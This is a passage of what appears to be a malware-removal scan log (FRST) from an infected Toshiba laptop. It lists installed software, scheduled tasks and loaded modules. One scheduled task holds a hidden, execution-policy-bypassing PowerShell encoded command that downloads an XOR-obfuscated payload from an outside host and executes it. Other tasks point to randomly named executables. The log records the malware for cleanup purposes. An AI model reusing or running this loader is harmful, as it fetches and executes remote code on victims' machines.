TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.0.4.64 - TOSHIBA Corporation)
TOSHIBA Hardware Setup (HKLM-x32\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.1.2.9 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.0.64.0 - TOSHIBA Corporation)
TOSHIBA Internal Modem Region Select Utility (HKLM-x32\...\InstallShield_{89F7D66C-777D-473B-AA11-319C0F190EAC}) (Version:  - )
Toshiba Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba)
TOSHIBA Recovery Disc Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.0.0.2 for x64 - TOSHIBA Corporation)
Toshiba Registration (HKLM-x32\...\{C53D16CC-E56F-47B8-906E-70AAF8EABB4F}) (Version: 1.00.0000 - Datalode Inc.)
Toshiba Resources Page (HKLM-x32\...\{21526716-DFD8-4B90-86D9-EF9F47057B3E}) (Version: 1.0.2.1 - TOSHIBA Corporation)
TOSHIBA SD Memory Utilities (HKLM\...\{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}) (Version: 1.9.1.12 - TOSHIBA)
TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version:  - Agere Systems)
TOSHIBA Speech System Applications (HKLM-x32\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version:  - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM-x32\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM-x32\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM-x32\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.02 - TOSHIBA Corporation)
TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.2.1.0 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.2.8.64 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.0.1.8 - TOSHIBA Corporation)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Webroot AntiVirus with Spy Sweeper (HKLM-x32\...\{1FCC574F-AFA2-4432-9EF1-79CA7BA73431}_is1) (Version: 6.1 - Webroot Software, Inc.)
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.66 - WildTangent)
Windows Driver Package - TOSHIBA (FwLnk) System  (11/19/2006 1.0.0.3) (HKLM\...\D27D7E9318CFA89EDDE8D448B507A8EB725F5A52) (Version: 11/19/2006 1.0.0.3 - TOSHIBA)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F85781D-2C97-4D9D-9632-7EFDBF2EB0A8} - \WebBarLaunchTask -> No File <==== ATTENTION
Task: {11DD6B62-185E-4E63-8F45-4FFC691C9B06} - \WebBarUpdateTask -> No File <==== ATTENTION
Task: {263A5680-836D-4B0F-BB3C-249E8B753F8E} - System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [2009-11-06] (Webroot Software, Inc.)
Task: {360E6CE9-8445-48AB-A36D-4F5A65A97683} - \DriverUpdate Startup -> No File <==== ATTENTION
Task: {3A51EE16-6E79-450D-A8FD-2A0BD34DFD95} - System32\Tasks\PubMach138 => C:\Users\Barbara\AppData\Local\RustiSens806\Rutransform.exe [2016-01-23] ()
Task: {4D77D01E-DB5F-4653-8377-E8C2AB310C52} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION
Task: {79092768-F5C7-4D08-B1B7-9C7A7A0F414F} - System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG8AcABlAG4AeQBlAHMALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGkAegA3ADkAWQBjAGsAcQB6AFEARABQAHAAagB4AFYAQwAxAE4AdgBjAHQAWQBXAHQAWQBlAG4AeABjAFUATgBLAHIAVABaAGYAZQBXAFIARwBCAHgAMwB5AHYAYgBpAGMARwB5ADMARABsAFgAOABkAEMAMQBiAHcARgBoAF8AdwB2AE4ATwAxAE4ANgBqAHoARQA4AFUAagAyAGoAawA1AHUAVwAyAFUAQwA1AHEAWQBOADQAdgBfAHcANABRADQAQwBiAEYAdgBaADcAcgB5AEsATAAwADYANwBKAEYATgBOAGcAVgB5AGYAQQBBAHQANgBnAEkAMQBZAGIAbQBHAFcAQQBoAGkATABxAGUAQQA3ADgAeAAtAF8ASwBRADYAMwBUAHMAdgB1AEsAcwBBAGgAaQB0AGQAQwBPAFAAOQBXADgAOQAyAFYATgBVAEMAcABaADAATAB5AGoASwB2AGYARABjAEcAcwB3AG0AdgBqAF8ANQBYAFIANwBDAGMAWQA2AC0AbwBUADAAQQAwAFUAOABpAFQAcgA2AFYASQBRAFYAdgByAE8AUABrAEUATABTAGsARQBSAFIAegB6AEgAQQBUAG0AcQBRAHgANwBPAGsAUQBFAE0AbQBWAG0ANQBlAGgAWgBnAFQAVQB2AGIAWQBlAHMATQBYAE4ANABLAEIATgBPAGcAYgBUAFQASABqAE8AZABuAHMARQBiAGQAMABpAFUAdgB1AEcAeAAyAEYATwBIAHoAQwBWAHYAQwB1AG0AdgAzAEQAVABLAHkAMwBQADIAMwBvADUAaABwAGcASQBYAFUASABvAGsAZwBKAEYAZwBkAFIAawBPAHAAYwBjAE4AZABoAFgASwBnAGgAVgBOAGkAZQAyAGQATQBIAHQAZgBuAGcAUgA0AFQARQBQAEkAagA4AGwAYwBoADYAYQB4AFMAMAB1AEoAWQBvAGMAWQBzAG4AeAB6AEYAVwBEAHQAeQB5AHYARAAxAGQASwBZAGcAUwA4AHkAQQBKAGcAcwBoAGkAVgBzADcARAB1AHgAcwBLAGIAdAB2ADUARABlAGgAcQBBAEQARAAzAG4AdgBZAE8AagBnAE0AdQBqAEMAcQBPAFQATwAtAEYAWABuAEoAOABUAG4ARwBxAG4AUAAyAGcASgBJAGoAYgA2AEcAYwBLADQAbABLADEAawAyAGMANwBGAGQAYQBTADYAMABfAHMAdAB5AEkAYgBJAC0AcQBQAHUAbwBOAGQAZwBkAFcAQgB6AC0AZAB5ADgAbwB4ADAAbgBnAGEAZgBVAHQAVABDAGsAdgBsADYAWgA5AHUAUQBrADMAMABYAGMAZwBoAFQAdwBuADgAUwByAFQAbQB1AGEAYgBtAEwANABOAEYAMABrAGIAYgAyAGcASwB5AEEAQgBNAHkAcgBFAEIAQwA4AFAAXwB2AFgAVABiAHEAbwBOAEQAZABVAGYANgB6AHUATABKADUATwBZAEcAOQBHAC0AdwBOAFIAMAA2ADEAMgA2AGEAaABZAHcAaQBvAFIANQBkAG0AUAAwAHEAZABkAHgAcQBsAGgAXwBxAGgAOAByAFYATABSAEMANgBnAHkAbgA1AF8ATQBOAE8AOABIADkAUQBlAEcAZAB0AEsAMwAxADQAcgA1AFIAYQBFAC0AWQBHAFgAdAAtAE4AQwBoAGcANwBMADkAbQBWAFMAZABiAHoAQwB3AG4AcABNAEoARABMADQAUgBVAEIAMABSAHkAZgBfAHEAegBWAG4ASQBDAHkAdQBlAFoAYQBoAEwAWgBEADQAcwA4AFIANQBtAGIAUQA4AE0AZQBMAHYAbgBFAG4ASABKAEkAQwBsAGcAMwBnAGgATgBNAGoAUABDAEQAMwBDAEYAVgBhAGsAMQBYAHAARwA4AEMASQBpADEAQgBnAE4AeQB0AGEAagAzAGIAbgBkAG8AeQBDAHgASwB1AG8AeABiAE0AQQB6AFgATABNAHQAaABjADkAbAA3ADMANgAxAGUAQwBoAHkAUAA4AHgAdQBOAEYAVwBWAGUAeABOAGoAawBzADEANwB5AFMAUgByADkAYwBxAEUATAByADYAUgByAFcAWAB1AFYATgAyADkANwBJADIANAB0ADEAcwBrAE8AcwBQAGcAawBUAE0ASQBDAEMAXwBqAHIAUgA4AHIAMwBxAFAANQAyAHYAdABNADIANQB5AHkAUABMAE8AeQBnADEAYQAwADAAVQBjAEYAYQBtAHIAWQBoAGsASQBPAHQATABTAFAAZQB6AE8ASAA5AG4AYQBjAEsARABqAHMAQwBkADYAYgBqAFkAagBDAFMAMgB2AFQAXwB5ADYAQgAzAFUAagBhAEQAaAAwADkARQBYAGIAeABhAFYAJgBjAD0AdAA2AG4AcwA4AEkAMABBAFMANgBqAGgASQBxADkAYQBqAGsAZwAzADkAYQB4AHMAWQBHAFgASgBnAHEARwA2ADcAOQBmAGwAQQBPAEYAbgBPAE0ANAAwAFEARAAxAFkANgBpAE0ARgBWADUAOAAxAEcAMgBPAEoAUQBOAHMAOAB0ADAAbgBNAGkAdwBzAE4ASgA0AE0AMwBZAGUAVgBmAEcAdQBfADYAYQBRAF8ARQBaAG4AMgBEAGIARABRAF8AVAB5AEwAMwBXAG8AdgBuAFYAOAA1AF8AZgBmAGwAOQBYAEYAbgBsAFAAeQBYAFEAOAByAGUAZQBhAGYANgB3AFIAZQBXAE0AUQBXAGkAagA2ADEAeAAtAFQAWABzAHEANgBCAFoAVgBpADIAMABaADQAVQBLAE8AeAB1AFcAbgBFAHUAeQBrAGQAaQBEAHIAYwA5AGgAVwBIAGYANwBjAG0AeABVAHAAawBLAG8ASgAtAHQAXwA2ADQAUgB0AFoATQA2ADQAYwA0AG8ARwAzAEcAaABjAHkAMQB0AFkARQBrAE4AXwB0AF8AQwBoADEAVgBDADMAdABIAFIAcABwAGsAZQBMADIAVQBjADkATgA3AF8AUQBhAFEASQBqADUARwA3AHkAMwBEAHUAMwB2AGIAXwB0AFkANwBmAFYAcgBTADMARQB5ADUANwB5AGUAWQBZAEgAaQBLAHgATwBPADQAQwBIAHoANABmAG4ARgBGADIAMABJAGkAagB1AHgAVABNAG4AaABBAEMAMwBCAHEASwAtAGcAXwBJAG0ANgBPAE0AQgBIAGwAZwAwAHYAZwBOAEQAWAAtADUAdQB4AGIATgBnAFMAeQBsAGUASwBjAFgAYgBQAHQAbgBpAGoAMQBnAEEAXwBtAGkALQBxAGQASwB3AHUAbgBvAF8AOQBLAG4AMwBPADkAQwBWAFYAVABSAC0AdQBTAFAAUgBLAEcAMwBIAEQATAB6AGgAWABQAEsAMABEADgATQBJADkAeQB5AE4AZgBIAFEAYQBWAE0AMwBuAC0AYQBiAGgAWQBpAFgASwBwADkATgA0AHgANgB2AEsAeABNAGYASQBrAEEARwB6ADIARABCAGkAeQA3AFcANgBVAHcAbQBjADUAaABmAGQASAB5AFUAUAA5AHQAagB0AEMAVwBvAE0AYQBuAFIAbwBRAFgAZwBYADgAdABFADAAdwAxAHIAVwBjAGUAYgBGADYAVgBkAG8AdgA4ADUANQBoAG8AYgBoAHIASgBKAEMAcAB6ADkATAB3AFkAYwBOAGkAdABlAEYAUQBqAHIAUAB0AGcAUQBoAGoAWgA2AFoAaQBiAGsARgBjAFgANAA4AFUAaABWAGUATABNAEEAUgBwAHMAbQBIAHYALQB3AGsAVwBqAHkANQBnAFUAdgB6AEcAOQBRAEUAbQA0AGMAYQBFAEMAWAB0ADMASQA1ADkAeQBhAEUAcQBoAFYAWQB5AHEAeQBmAEUAeQBuAF8AZAA3AHYANQBDADAATgA5AG8AQQBIAE4AeQByAF8AQwBVAFgATgBXAE4AdgA5AEMAbABVAGgATwAyAHIARQBRAFYAQQByAEEAcwBHAGEAUQBSADYAdABYAFIAVgA5AE0AVQAwAGEAMwBRAEcAUgBrAHkAcQBWADkAUABHAEEAUABRAEIAdABCAGsAaABQAHcARABVAGcAbQBOAEoAbQBSAFgANgBuAHAAcwBOAGgAcQBOAGYAMQBxAG8ARAA0AHkANwBwAFIAaAA1AGQAUgBpAHIAcwBaAHYAZAA1AGcAcgBqAGcASwBEAEMAMQBFAGoANwBPAG0AMwBXAGkAMQBwAGIAUgBfAHEAMwBRAEMAQQBlAFkATwA1ADkAdQBqAHkAVwB2AG4AdwA4ADIAdAAzAFgANwBPAE4AZwBMADkANwB0AC0AdwBNADMAWAAxAGoARwA0AGsAVQBsAEYAQQBtAHEAVwBxAHUAQgBpAHgAWAAxAFMAZgB1AEcATAA1ADAAQQBNAEkAbQBjAHAAOABqAGkAMABDAFgAaQBtADEAcQBaAGcASwBfAFIAdQB2AEYAcgA3ADUAcQBCAG4ASABpADYATgBZAF8AVwBmAFAAdgBtADgAMQBHAEQAOABWAHYAZgBFAEcAZABJAFMANgBkAEoAUgBRAG0ATwBvADgAUwBIAHEAdQBSAFoAegA0AEEAUQBjAGYATQBSAE0AaQBDAGoAawBVADcAcABTAFAAagBlAGMAZwA5AF8AUQBqAEcAUQBTAHcANABiAFcAVwBDAFgAXwA4AEQATgBSAEUAcgB5AGMAMgBQAFMARgB5AHkAMwBaAEcAdwBHAGYAeQBnAHEAUABiADMAQwB6AFoAVgBOAGIAUQA0AFMAcwBOAGQALQB5AEIAUQBYAFAANQBPADYAMwBVAFAAXwB3AG8AaQBuAGcARQBjAFIARwBEAEcAQQBrAFUAdQBNAEQASwBIAFEAbQAzAGsAVQBOAGcANQBlACYAcgA9ADQANAA4ADgANAAxADIANQA5ADEANAAxADkANAAyADQAMwA1ADYAIgA7ACQAcwB0AHMAawA9ACIAewA3AEUANwA4ADAARAA0ADcALQAwAEQAMABCAC0AMABFADAANQAtADAAOQAxADEALQAwAEYAMABDADAAOAAwAEEAMQAxADcARAB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIASQBMAE8ASABGAFAASwBRACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {81FDB296-4C8A-4B83-A959-123B2D5E60D2} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {9858409A-6BF2-406E-B2D7-4793E237FFF1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {A4D38401-1428-46C7-AD2C-73A09F16C38F} - \DriverUpdate Scan -> No File <==== ATTENTION
Task: {A5190072-4239-4907-9D98-7871BD0DDBB9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {AE8343D2-863F-44E2-8FAE-B123C5BA930C} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {B9545D91-42EE-4132-B2FA-A6D10D25BE8A} - \One System Care Task -> No File <==== ATTENTION
Task: {BB42D120-21AC-4A10-8D46-C325D413A0DF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {C02F531F-476C-495D-BFA2-503EB2277BDB} - System32\Tasks\Brooucnejo => C:\ProgramData\Brooucnejo\1.0.7.1\semsikeh.exe
Task: {DB208AD7-F908-420A-8C84-CB29D9D5AF30} - \One System Care Monitor -> No File <==== ATTENTION
Task: {EA39D524-1CC9-4D84-86F5-6FC1F8939BAC} - \UpdateAdmin -> No File <==== ATTENTION
Task: {FC491F5B-D745-4FC7-A39F-466825B5D486} - System32\Tasks\OutstandinDivisio6 => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: {FF9497ED-7720-46DB-A12E-809C65F6789A} - \One System CarePeriod -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\OutstandinDivisio6.job => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: C:\Windows\Tasks\PubMach138.job => C:\Users\Barbara\AppData\Local\RUSTIS~1\Rutransform.exe
Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe>/ScheduleSweep=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A C:\BarbaraӖ眇扥潲瑯ӆTaskName=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A
ApplicationName=C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2007-09-06 12:27 - 2007-09-06 12:27 - 01331712 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2009-02-27 10:11 - 2009-02-27 10:11 - 00335360 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2015-01-25 10:26 - 2006-01-12 09:24 - 00141312 _____ () C:\Windows\system32\spool\PRTPROCS\x64\lxcypp6c.dll
2014-11-18 01:04 - 2009-04-22 01:06 - 00120320 _____ () C:\Windows\system32\atitmm64.dll
2009-03-07 16:15 - 2009-03-07 16:15 - 06986552 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2008-07-14 13:35 - 2008-07-14 13:35 - 00107832 _____ () C:\Program Files\TOSHIBA\FlashCards\TWarnMsg\TWarnMsg.dll
2009-05-03 01:35 - 2007-04-23 11:09 - 00016896 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll
2007-12-19 15:13 - 2007-12-19 15:13 - 00078848 _____ () C:\Program Files\TOSHIBA\HDD Protection\NotifyThp.dll
2009-03-12 22:08 - 2009-03-12 22:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll
2007-04-24 23:47 - 2007-04-24 23:47 - 00012288 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2009-02-10 14:32 - 2009-02-10 14:32 - 00076288 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2014-11-18 01:05 - 2014-11-18 01:05 - 00014848 _____ () C:\Windows\assembly\GAC_MSIL\AxInterop.WBOCXLib\1.0.0.0__90ba9c70f846762e\AxInterop.WBOCXLib.dll
2008-11-25 13:19 - 2008-11-25 13:19 - 01193472 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Implementation\64\wbocx.ocx
2009-01-30 13:41 - 2009-01-30 13:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2014-11-18 01:05 - 2014-11-18 01:05 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2009-02-16 19:09 - 2009-02-16 19:09 - 00868352 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMediaLibrary.dll
2009-02-16 19:09 - 2009-02-16 19:09 - 00007680 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvcPS.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WebrootSpySweeperService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WRConsumerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WebrootSpySweeperService => ""="Service"
